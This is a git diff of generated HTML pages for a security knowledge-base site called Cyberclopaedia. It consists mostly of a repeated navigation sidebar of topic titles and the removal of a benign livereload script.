          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -181,22 +181,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Permissions.html b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Permissions.html index b24b5f8a..52a1f7ca 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Permissions.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Permissions.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -192,22 +192,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Unquoted Service Paths.html b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Unquoted Service Paths.html index e4a39b57..d7f58927 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Unquoted Service Paths.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Unquoted Service Paths.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
